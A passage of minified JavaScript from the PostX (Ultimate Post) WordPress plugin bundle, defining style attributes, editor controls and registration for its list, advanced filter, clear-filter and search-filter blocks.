.ultp-listicon-bg"}]},listIconHoverColor:{type:"string",default:"",style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}}.wp-block-ultimate-post-list:hover .ultp-list-texticon:before { color:{{listIconHoverColor}}; }"},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}}.wp-block-ultimate-post-list:hover .ultp-list-texticon:before { background-color:{{listIconHoverColor}}; }"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}}.wp-block-ultimate-post-list:hover .ultp-listicon-bg svg { color:{{listIconHoverColor}}; }"}]},listIconHoverBg:{type:"string",default:"",style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:".block-editor-block-list__block:hover > {{ULTP}}.wp-block-ultimate-post-list .ultp-list-texticon:before,\n                .ultp-list-wrapper > {{ULTP}}.wp-block-ultimate-post-list:hover .ultp-list-texticon:before { background: {{listIconHoverBg}};}"},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}}.wp-block-ultimate-post-list:hover .ultp-list-texticon { background-color:{{listIconHoverBg}}; }"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}}.wp-block-ultimate-post-list:hover .ultp-listicon-bg { background: {{listIconHoverBg}};}"}]},listIconHoverBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:".block-editor-block-list__block:hover > {{ULTP}}.wp-block-ultimate-post-list .ultp-list-texticon:before,  \n                .ultp-list-wrapper > {{ULTP}}.wp-block-ultimate-post-list:hover .ultp-list-texticon:before"},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:".block-editor-block-list__block:hover > {{ULTP}}.wp-block-ultimate-post-list .ultp-list-texticon, \n                .ultp-list-wrapper > {{ULTP}}.wp-block-ultimate-post-list:hover .ultp-list-texticon"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:".block-editor-block-list__block:hover > {{ULTP}}.wp-block-ultimate-post-list .ultp-listicon-bg, \n                .ultp-list-wrapper > {{ULTP}}.wp-block-ultimate-post-list:hover .ultp-listicon-bg"}]},listTextColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-list-title,\n            {{ULTP}} .ultp-list-title a { color:{{listTextColor}}; } "}]},listTextHoverColor:{type:"string",default:"",style:[{selector:"\n            .ultp-list-wrapper > {{ULTP}}.wp-block-ultimate-post-list:hover .ultp-list-title, \n            .ultp-list-wrapper > {{ULTP}}.wp-block-ultimate-post-list:hover .ultp-list-title a, \n            .block-editor-block-list__block:hover > {{ULTP}}.wp-block-ultimate-post-list .ultp-list-title, \n            .block-editor-block-list__block:hover > {{ULTP}}.wp-block-ultimate-post-list .ultp-list-title a { color:{{listTextHoverColor}}; } "}]},subtext:{type:"string",default:""},subTextSpace:{type:"object",default:{lg:"",ulg:"px"},style:[{depends:[{key:"layout",condition:"==",value:"layout3"},{key:"listGroupSubtextEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-list-subtext { margin-top:{{subTextSpace}}; }"},{depends:[{key:"layout",condition:"!=",value:"layout3"},{key:"listGroupSubtextEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-list-content { row-gap:{{subTextSpace}}; }"}]},subTextColor:{type:"string",default:"",style:[{depends:[{key:"listGroupSubtextEnable",condition:"==",value:!0}],selector:"{{ULTP}}  .ultp-list-subtext { color:{{subTextColor}}; }"}]},listSubtextHoverColor:{type:"string",default:"",style:[{depends:[{key:"listGroupSubtextEnable",condition:"==",value:!0}],selector:".ultp-list-wrapper > {{ULTP}}.wp-block-ultimate-post-list:hover .ultp-list-subtext, \n            .block-editor-block-list__block:hover > {{ULTP}}.wp-block-ultimate-post-list .ultp-list-subtext { color:{{listSubtextHoverColor}}; }"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"div:has(>\n            {{ULTP}}) {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"div:has(>\n            {{ULTP}}) {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"div:has(>\n            {{ULTP}}) {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]},...l(69735).KF}},24570:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});var o=l(87462),a=l(67294),i=l(83245),n=l(87383);const{Fragment:r}=wp.element,s=[{attributes:{...n.Z},save(e){const{attributes:{blockId:t,advanceId:l,listText:n,listCustomImg:s,listIconType:p,listGroupSubtextEnable:c,subtext:u,listGroupCustomImg:d,listGroupIconType:m,listDisableText:g,listGroupBelowIcon:y,listCustomIcon:b,listSinleCustomIcon:v,layout:h,enableIcon:f}}=e,k=y&&"layout3"!=h?"div":r;function w(e){return"default"!=m&&(p==e||"inherit"==p&&m==e)||""==p&&m==e}const x=w("image"),T=w("icon");return(0,a.createElement)("li",(0,o.Z)({},l&&{id:l},{className:`ultp-block-${t}`}),(0,a.createElement)("div",{className:"ultp-list-content"},(0,a.createElement)(k,y&&"layout3"!=h&&{class:"ultp-list-heading"},"default"==m&&f&&(0,a.createElement)("div",{className:"ultp-list-texticon ultp-listicon-bg"}),x&&f&&(0,a.createElement)("div",{className:"ultp-listicon-bg"},(0,a.createElement)("img",{src:s.url?s.url:d.url,alt:"List Image"})),T&&f&&(0,a.createElement)("div",{className:"ultp-listicon-bg"},i.ZP[v.length>0&&"inherit"!=p?v:b]),!g&&(0,a.createElement)("div",{className:"ultp-list-title",dangerouslySetInnerHTML:{__html:n}})),!g&&c&&(0,a.createElement)("div",{className:"ultp-list-subtext",dangerouslySetInnerHTML:{__html:u}})))}}]},82738:(e,t,l)=>{"use strict";var o=l(67294),a=l(67532),i=l(36681),n=l(87383),r=l(58063),s=l(24570);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks;p(r,{parent:["ultimate-post/advanced-list"],icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/single-list.svg",alt:"List"}),attributes:n.Z,edit:a.Z,save:i.Z,deprecated:s.Z})},4902:(e,t,l)=>{"use strict";l.d(t,{Z:()=>y});var o=l(67294),a=l(53049),i=l(99838),n=l(99242);const{useBlockProps:r,useInnerBlocksProps:s}=wp.blockEditor,{useEffect:p}=wp.element,{useSelect:c}=wp.data,u=[["ultimate-post/filter-select",{type:"tags",allText:"All Tags"},[]],["ultimate-post/filter-select",{type:"category",allText:"All Categories"},[]],["ultimate-post/filter-select",{type:"order"},[]]],d=["ultimate-post/filter-select","ultimate-post/filter-clear","ultimate-post/filter-search-adv"],m=["ultimate-post/filter-select/tags","ultimate-post/filter-select/categories","ultimate-post/filter-select/order","ultimate-post/filter-clear","ultimate-post/filter-select/search","ultimate-post/filter-select/adv_sort"],g=new Set(["filter-select/adv_sort","filter-select/order_by","filter-select/order","filter-select/author","filter-clear","filter-search-adv"].map((e=>"editor-block-list-item-ultimate-post-"+e)));function y({attributes:e,setAttributes:t,clientId:l,context:y,isSelected:b}){const{blockId:v,currentPostId:h}=e;p((()=>{(0,a.qi)(t,"",h,l),t({blockId:l.slice(-6),clientId:l})}),[l]);const f=c((e=>e("core/block-editor").getBlocks(l)||[]));p((()=>{const{selectBlock:e}=wp.data.dispatch("core/block-editor");e(l)}),[f.length,l]),p((()=>{if(!b)return;const e=wp.data.subscribe((()=>{wp.data.select("core/block-editor").getBlocks(l).map((e=>"editor-block-list-item-"+e.name.replace("/","-")+(e.name.includes("filter-select")?"/"+e.attributes.type:""))).forEach((e=>{g.has(e)&&Array.from(document.getElementsByClassName(e)).forEach((e=>{e.ariaDisabled="true",e.style.pointerEvents="none"}))}))}));return()=>e()}),[b]);const k=s(r({className:`ultp-block-${v} ultp-filter-block`,"data-postid":y.postId}),{orientation:"horizontal",template:u,templateLock:!1,allowedBlocks:d,prioritizedInserterBlocks:m,templateInsertUpdatesSelection:!1});let w;return v&&(w=(0,i.Kh)(e,"ultimate-post/advanced-filter",v,(0,a.k0)())),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(n.Z,{attributes:e,setAttributes:t,name:"ultimate-post/advanced-filter",clientId:l}),w&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:w}}),(0,o.createElement)("div",k))}},79060:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294);const{useBlockProps:a,useInnerBlocksProps:i}=wp.blockEditor;function n({attributes:e}){const{blockId:t}=e,l=i.save(a.save({className:`ultp-block-${t} ultp-filter-block`}));return(0,o.createElement)("div",l)}},99242:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});var o=l(67294),a=l(53049),i=l(92637),n=l(31760);const{__}=wp.i18n,{InspectorControls:r}=wp.blockEditor;function s({name:e,attributes:t,setAttributes:l,clientId:s}){const p={setAttributes:l,name:e,attributes:t,clientId:s};return(0,o.createElement)(o.Fragment,null,(0,o.createElement)(n.Z,{store:p,include:[{type:"adv_filter"},{type:"inserter",label:__("Add Filters","ultimate-post"),clientId:s}]}),(0,o.createElement)(r,null,(0,o.createElement)(i.SectionsNoTab,null,(0,o.createElement)(i.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:a.wK,store:p,initialOpen:!0}))),(0,a.dH)()))}},70766:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},relation:{type:"string",default:"AND"},align:{type:"object",default:{lg:"flex-start"},style:[{selector:"{{ULTP}} { justify-content: {{align}}; }"}]},gapChild:{type:"object",default:{lg:"10",unit:"px"},style:[{selector:"{{ULTP}} { gap: {{gapChild}}; }"}]},spacingTop:{type:"object",default:{lg:"10",unit:"px"},style:[{selector:"{{ULTP}} { margin-top: {{spacingTop}} !important; }"}]},spacingBottom:{type:"object",default:{lg:"10",unit:"px"},style:[{selector:"{{ULTP}} { margin-bottom: {{spacingBottom}} !important; }"}]}}},40044:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);function a({attributes:e,onChange:t}){const{clearButtonText:l}=e;return(0,o.createElement)("button",{className:"ultp-clear-button",onClick:t},l)}},14585:(e,t,l)=>{"use strict";l.d(t,{Z:()=>b});var o=l(87462),a=l(67294),i=l(53049),n=l(99838),r=l(87025),s=l(40044),p=l(85291),c=l(27774);const{__}=wp.i18n,{useEffect:u}=wp.element,{useBlockProps:d}=wp.blockEditor,{useSelect:m}=wp.data,{selectBlock:g}=wp.data.dispatch("core/block-editor"),y="ultimate-post/filter-clear";function b({attributes:e,setAttributes:t,clientId:l,context:b,isSelected:v}){const{blockId:h}=e,f=b["advanced-filter/cId"],k=m((e=>{const t=e("core/block-editor").getBlocks(f);return(0,r.FL)(t).filter((e=>"ultimate-post/filter-select"===e.name))}),[f]),w=(0,r.NH)(k)||[];u((()=>{t({blockId:l.slice(-6)})}),[l]);const x=d({className:`ultp-block-${h} ultp-filter-clear`});let T;return h&&(T=(0,n.Kh)(e,y,h,(0,i.k0)())),(0,a.createElement)(a.Fragment,null,(0,a.createElement)(c.Z,{name:y,attributes:e,setAttributes:t,clientId:l}),T&&(0,a.createElement)("style",{dangerouslySetInnerHTML:{__html:T}}),(0,a.createElement)("div",{className:`ultp-block-${h}-wrapper`},(0,a.createElement)(a.Fragment,null,w.map(((e,t)=>Object.keys(e).map((t=>(0,a.createElement)("div",(0,o.Z)({},x,{key:t}),(0,a.createElement)(p.Z,{text:e[t],clientId:t,onChange:e=>(0,r.Dg)(e)})))))),(0,a.createElement)("div",x,(0,a.createElement)(s.Z,{attributes:e,onChange:()=>{w.forEach((e=>{Object.keys(e).forEach((e=>{(0,r.Dg)(e)}))})),g(l)}})))))}},85291:(e,t,l)=>{"use strict";l.d(t,{Z:()=>i});var o=l(67294),a=l(64766);function i({text:e,clientId:t,onChange:l}){return(0,o.createElement)("div",{className:"ultp-selected-filter"},(0,o.createElement)("span",{className:"ultp-selected-filter-icon",role:"button",onClick:()=>l(t)},a.ZP?.close_line),(0,o.createElement)("span",{className:"ultp-selected-filter-text"},e))}},27774:(e,t,l)=>{"use strict";l.d(t,{Z:()=>b});var o=l(67294),a=l(53049),i=l(87763),n=l(92637),r=l(31760);const{__}=wp.i18n,{InspectorControls:s}=wp.blockEditor,p=[{icon:(0,o.createElement)("span",{className:"dashicons dashicons-editor-alignleft"}),value:"start",label:__("Left","ultimate-post")},{icon:(0,o.createElement)("span",{className:"dashicons dashicons-editor-justify"}),value:"center",label:__("Normal","ultimate-post")},{icon:(0,o.createElement)("span",{className:"dashicons dashicons-editor-alignright"}),value:"end",label:__("Right","ultimate-post")}],c=[{data:{type:"toggle",key:"cAlignEnable",label:__("Enable Alignement Controls","ultimate-post")}},{data:{type:"alignment",key:"cAlign",disableIf:e=>!e.cAlignEnable,responsive:!0,label:__("Alignment","ultimate-post"),options:p.map((e=>e.value))}},{data:{type:"tag",key:"clearButtonPosition",label:__("Position","ultimate-post"),options:[{value:"auto",label:__("Inline","ultimate-post")},{value:"100%",label:__("Block","ultimate-post")}]}},{data:{type:"text",key:"clearButtonText",label:__("Text","ultimate-post")}}],u=[{data:{type:"typography",key:"cbTypo",label:__("Typography","ultimate-post")}},{data:{type:"color",key:"cbColor",label:__("Color","ultimate-post")}},{data:{type:"color",key:"cbColorHover",label:__("Hover Color","ultimate-post")}},{data:{type:"color",key:"cbBgColor",label:__("Background Color","ultimate-post")}},{data:{type:"color",key:"cbBgHoverColor",label:__("Background Hover Color","ultimate-post")}},{data:{type:"border",key:"cbBorder",label:__("Border","ultimate-post")}},{data:{type:"dimension",key:"cbBorderRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"boxshadow",key:"cbBoxShadow",label:__("BoxShadow","ultimate-post")}},{data:{type:"range",key:"gap",min:0,max:500,step:1,responsive:!0,unit:["px","em","rem"],label:__("Gap Between Items","ultimate-post")}},{data:{type:"dimension",key:"cbPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}}],d=[{data:{type:"typography",key:"sfTypo",label:__("Typography","ultimate-post")}},{data:{type:"range",key:"sfIconSize",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Icon Size","ultimate-post")}},{data:{type:"color",key:"sfColor",label:__("Color","ultimate-post")}},{data:{type:"color",key:"sfColorHover",label:__("Hover Color","ultimate-post")}},{data:{type:"color",key:"sfBgColor",label:__("Background Color","ultimate-post")}},{data:{type:"color",key:"sfBgHoverColor",label:__("Background Hover Color","ultimate-post")}},{data:{type:"border",key:"sfBorder",label:__("Border","ultimate-post")}},{data:{type:"dimension",key:"sfBorderRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"boxshadow",key:"sfBoxShadow",label:__("BoxShadow","ultimate-post")}},{data:{type:"dimension",key:"sfPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}}],m=e=>e.map((e=>e.data)),g=()=>[{isToolbar:!0,data:{type:"tab_toolbar",content:[{name:"clear_button_set",title:__("Clear Button Settings","ultimate-post"),options:m(c)}]}}],y=()=>[{isToolbar:!0,data:{type:"tab_toolbar",content:[{name:"clear_button_sty",title:__("Clear Button Styles","ultimate-post"),options:m(u)},{name:"selected_filter_sty",title:__("Selected Filter Styles","ultimate-post"),options:m(d)}]}}];function b({attributes:e,setAttributes:t,name:l,clientId:p}){const m={setAttributes:t,name:l,attributes:e,clientId:p};return(0,o.createElement)(o.Fragment,null,(0,o.createElement)(r.Z,{store:m,include:[{type:"custom",icon:i.Z.setting,label:__("Clear Filter Settings","ultimate-post")}]},(0,o.createElement)(a.B3,{store:m,include:g()})),(0,o.createElement)(r.Z,{store:m,include:[{type:"custom",icon:i.Z.styleIcon,label:__("Clear Filter Styles","ultimate-post")}]},(0,o.createElement)(a.B3,{store:m,include:y()})),(0,o.createElement)(s,null,(0,o.createElement)(n.Sections,{classes:"ultp-clear-filter-settings"},(0,o.createElement)(n.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",store:m,include:c})),(0,o.createElement)(n.Section,{slug:"style",title:__("Styles","ultimate-post")},(0,o.createElement)(a.T,{title:__("Clear Button Style","ultimate-post"),initialOpen:!0,store:m,include:u}),(0,o.createElement)(a.T,{title:__("Selected Filter Style","ultimate-post"),store:m,include:d,initialOpen:!0}))),(0,a.dH)()))}},61102:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},clearButtonText:{type:"string",default:"Clear Filter"},clearButtonPosition:{type:"string",default:"auto",style:[{selector:"{{ULTP}}-wrapper { flex-basis: {{clearButtonPosition}} ; }"}]},cAlignEnable:{type:"boolean",default:!1},cAlign:{type:"string",default:{lg:"start",sm:"start",xs:"start"},style:[{selector:"{{ULTP}}-wrapper { justify-content:{{cAlign}} ; display:flex;flex-wrap:wrap; }"},{depends:[{key:"cAlignEnable",condition:"==",value:!0}],selector:"{{ULTP}}-wrapper { justify-content:{{cAlign}} ; display:flex;flex-wrap:wrap;flex-grow:1; }"}]},gap:{type:"object",default:{lg:"10",unit:"px"},style:[{selector:"{{ULTP}}-wrapper { gap: {{gap}}; }"}]},cbTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},height:{lg:"20",unit:"px"},decoration:"none",transform:"",family:"",weight:"400"},style:[{selector:"{{ULTP}} .ultp-clear-button"}]},cbColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-clear-button { color:{{cbColor}}; } "}]},cbColorHover:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-clear-button:hover { color:{{cbColorHover}}; } "}]},cbBgColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-clear-button { background-color:{{cbBgColor}}; } "}]},cbBgHoverColor:{type:"string",default:"var(--postx_preset_Secondary_color)",style:[{selector:"{{ULTP}} .ultp-clear-button:hover { background-color:{{cbBgHoverColor}}; } "}]},cbBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"var(--postx_preset_Contrast_1_color)",type:"solid"},style:[{selector:"{{ULTP}} .ultp-clear-button"}]},cbBorderRadius:{type:"object",default:{lg:{top:"3",bottom:"3",left:"3",right:"3",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-clear-button { border-radius: {{cbBorderRadius}}; }"}]},cbBoxShadow:{type:"object",default:{openShadow:0,width:{top:0,right:0,bottom:0,left:0},color:"var(--postx_preset_Secondary_color)"},style:[{selector:"{{ULTP}} .ultp-clear-button"}]},cbPadding:{type:"object",default:{lg:{top:"8",bottom:"8",left:"10",right:"10",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-clear-button { padding:{{cbPadding}}; }"}]},sfTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},height:{lg:"20",unit:"px"},decoration:"none",transform:"",family:"",weight:"400"},style:[{selector:"{{ULTP}} .ultp-selected-filter-text"}]},sfIconSize:{type:"object",default:{lg:"13",unit:"px"},style:[{selector:"{{ULTP}} .ultp-selected-filter-icon svg { width: {{sfIconSize}}; height:{{sfIconSize}} }"}]},sfColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-selected-filter-text { color:{{sfColor}}; }  \n                    {{ULTP}} .ultp-selected-filter-icon svg { fill:{{sfColor}}; }"}]},sfColorHover:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-selected-filter:hover .ultp-selected-filter-text { color:{{sfColorHover}}; }  \n                    {{ULTP}} .ultp-selected-filter:hover .ultp-selected-filter-icon svg { fill:{{sfColorHover}}; }"}]},sfBgColor:{type:"string",default:"var(--postx_preset_Secondary_color)",style:[{selector:"{{ULTP}} .ultp-selected-filter { background-color:{{sfBgColor}}; } "}]},sfBgHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-selected-filter:hover { background-color:{{sfBgHoverColor}}; } "}]},sfBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"var(--postx_preset_Contrast_1_color)",type:"solid"},style:[{selector:"{{ULTP}} .ultp-selected-filter"}]},sfBorderRadius:{type:"object",default:{lg:"3",unit:"px"},style:[{selector:"{{ULTP}} .ultp-selected-filter { border-radius:{{sfBorderRadius}}; }"}]},sfBoxShadow:{type:"object",default:{openShadow:1,width:{top:0,right:0,bottom:0,left:0},color:"var(--postx_preset_Secondary_color)"},style:[{selector:"{{ULTP}} .ultp-selected-filter"}]},sfPadding:{type:"object",default:{lg:{top:"5",bottom:"5",left:"6",right:"6",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-selected-filter { padding:{{sfPadding}}; }"}]}}},20223:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(61102),n=l(14585),r=l(54685);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks,p=(0,a.Z)("https://wpxpo.com/docs/postx/postx-features/advanced-post-filter/","block_docs");s(r,{icon:(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/adv-filter/clear-filter.svg"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Clears all the selected filter","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:p,rel:"noreferrer"},__("Documentation","ultimate-post"))),usesContext:["post-grid-parent/postBlockClientId","advanced-filter/cId"],edit:n.Z,ancestor:["ultimate-post/advanced-filter"],attributes:i.Z})},7402:(e,t,l)=>{"use strict";l.d(t,{Z:()=>c});var o=l(67294),a=l(53049),i=l(99838),n=l(64766),r=l(63658);const{__}=wp.i18n,{useEffect:s}=wp.element,{useBlockProps:p}=wp.blockEditor;function c({attributes:e,setAttributes:t,clientId:l,context:c}){const{blockId:u}=e;s((()=>{t({blockId:l.slice(-6)})}),[l]);const d=p({className:`ultp-block-${u} ultp-filter-search`});let m="";return u&&(m=(0,i.Kh)(e,"ultimate-post/filter-search-adv",u,(0,a.k0)())),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(r.Z,{name:"ultimate-post/filter-search-adv",attributes:e,setAttributes:t,clientId:l}),m&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:m}}),(0,o.createElement)("div",d,(0,o.createElement)("div",{className:"ultp-filter-search-input"},(0,o.createElement)("input",{"aria-label":"search",type:"search",placeholder:e.placeholder}),(0,o.createElement)("span",{className:"ultp-filter-search-input-icon"},n.ZP.search_line))))}},63658:(e,t,l)=>{"use strict";l.d(t,{Z:()=>y});var o=l(67294),a=l(53049),i=l(87763),n=l(92637),r=l(31760);const{__}=wp.i18n,{InspectorControls:s}=wp.blockEditor,p=[{icon:(0,o.createElement)("span",{className:"dashicons dashicons-editor-alignleft"}),value:"margin-right: auto !important;margin-left:0px !important",label:__("Left","ultimate-post")},{icon:(0,o.createElement)("span",{className:"dashicons dashicons-editor-justify"}),value:"margin-left:0px !important;margin-right:0px !important",label:__("Normal","ultimate-post")},{icon:(0,o.createElement)("span",{className:"dashicons dashicons-editor-alignright"}),value:"margin-left: auto !important;margin-right:0px !important",label:__("Right","ultimate-post")}],c=[{data:{type:"alignment",key:"searchAlign",responsive:!0,label:__("Alignment","ultimate-post"),options:p.map((e=>e.value)),icons:["left","flow","right"]}},{data:{type:"tag",key:"sWidthType",label:__("Input Width","ultimate-post"),options:[{value:"auto",label:__("Auto","ultimate-post")},{value:"fit-content",label:__("Fixed","ultimate-post")},{value:"100%",label:__("Full","ultimate-post")}]}},{data:{type:"range",key:"sWidth",min:0,max:500,step:1,responsive:!0,unit:["px","em","rem"],label:__("Max Width","ultimate-post")}},{data:{type:"text",key:"placeholder",label:__("Placeholder Text","ultimate-post")}}],u=[{data:{type:"typography",key:"sTypo",label:__("Typography","ultimate-post")}},{data:{type:"range",key:"sIconSize",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Icon Size","ultimate-post")}},{data:{type:"color",key:"sColor",label:__("Color","ultimate-post")}},{data:{type:"color",key:"sColorHover",label:__("Hover Color","ultimate-post")}},{data:{type:"color",key:"sBgColor",label:__("Background Color","ultimate-post")}},{data:{type:"border",key:"sBorder",label:__("Border","ultimate-post")}},{data:{type:"dimension",key:"sBorderRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"boxshadow",key:"sBoxShadow",label:__("BoxShadow","ultimate-post")}},{data:{type:"dimension",key:"sPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}}],d=e=>e.map((e=>e.data)),m=()=>[{isToolbar:!0,data:{type:"tab_toolbar",content:[{name:"settings",title:__("Search Filter Settings","ultimate-post"),options:d(c)}]}}],g=()=>[{isToolbar:!0,data:{type:"tab_toolbar",content:[{name:"style",title:__("Search Filter Style","ultimate-post"),options:d(u)}]}}];function y({attributes:e,setAttributes:t,name:l,clientId:p}){const d={setAttributes:t,name:l,attributes:e,clientId:p};return(0,o.createElement)(o.Fragment,null,(0,o.createElement)(r.Z,{store:d,include:[{type:"custom",label:__("Search Filter Settings","ultimate-post"),icon:i.Z.setting}]},(0,o.createElement)(a.B3,{store:d,include:m()})),(0,o.createElement)(r.Z,{store:d,include:[{type:"custom",label:__("Search Filter Style","ultimate-post"),icon:i.Z.styleIcon}]},(0,o.createElement)(a.B3,{store:d,include:g()})),(0,o.createElement)(s,null,(0,o.createElement)(n.Sections,{classes:"ultp-search-filter-settings"},(0,o.createElement)(n.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",store:d,include:c})),(0,o.createElement)(n.Section,{slug:"style",title:__("Styles","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",store:d,include:u}))),(0,a.dH)()))}},47878:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},placeholder:{type:"string",default:"Search..."},searchAlign:{type:"object",default:{lg:"margin-left:0px !important;margin-right:0px !important"},style:[{selector:"{{ULTP}} { {{searchAlign}} ; }"}]},sWidthType:{type:"string",default:"auto",style:[{selector:"{{ULTP}} { width: {{sWidthType}} ; }"}]},sWidth:{type:"object",default:{lg:"200",unit:"px"},style:[{depends:[{key:"sWidthType",condition:"==",value:"fit-content"}],selector:"{{ULTP}} .ultp-filter-search-input input {width:{{sWidth}} !important;}"}]},sTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},height:{lg:"20",unit:"px"},decoration:"none",transform:"",family:"",weight:"400"},style:[{selector:"{{ULTP}} .ultp-filter-search-input input"}]},sIconSize:{type:"object",default:{lg:"10",unit:"px"},style:[{selector:"{{ULTP}} .ultp-filter-search-input-icon svg { width: {{sIconSize}}; height:{{sIconSize}} }"}]},sColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-filter-search-input input, {{ULTP}} .ultp-filter-search-input input::placeholder { color:{{sColor}}; } {{ULTP}} .ultp-filter-search-input-icon svg { fill:{{sColor}}; } "}]},sColorHover:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-filter-search-input:hover input { color:{{sColorHover}}; } {{ULTP}} .ultp-filter-search-input:hover .ultp-filter-search-input-icon svg { fill:{{sColorHover}}; } "}]},sBgColor:{type:"string",default:"var(--postx_preset_Base_1_color)",style:[{selector:"{{ULTP}} .ultp-filter-search-input { background-color:{{sBgColor}}; } "}]},sBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"var(--postx_preset_Contrast_1_color)",type:"solid"},style:[{selector:"{{ULTP}} .ultp-filter-search-input"}]},sBorderRadius:{type:"object",default:{lg:"2",unit:"px"},style:[{selector:"{{ULTP}} .ultp-filter-search-input { border-radius:{{sBorderRadius}}; }"}]},sBoxShadow:{type:"object",default:{openShadow:0,width:{top:0,right:0,bottom:0,left:0},color:"var(--postx_preset_Secondary_color)"},style:[{selector:"{{ULTP}} .ultp-filter-search-input"}]},sPadding:{type:"object",default:{lg:{top:"3",bottom:"3",left:"4",right:"14",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-filter-search-input { padding:{{sPadding}}; }"}]}}},71184:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(47878),n=l(31631),r=l(7402);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks,p=(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/adv-filter/","block_docs");s(n,{icon:(0,o.createElement)("div",{className:"ultp-block-inserter-icon-section"},(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/adv-filter/search-filter.svg"}),!ultp_data.active&&(0,o.createElement)("span",{className:"ultp-pro-block"},"Pro")),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Search Filter","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:p,rel:"noreferrer"},__("Documentation","ultimate-post"))),usesContext:["post-grid-parent/postBlockClientId"],edit:r.Z,ancestor:["ultimate-post/advanced-filter"],attributes:i.Z})},25968:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(87462),a=l(67294);const{useBlockProps:i}=wp.blockEditor,{useState:n}=wp.element;function r({text:e,blockId:t,status:l}){const[r,s]=n(!1),p=i({className:`ultp-block-${t} 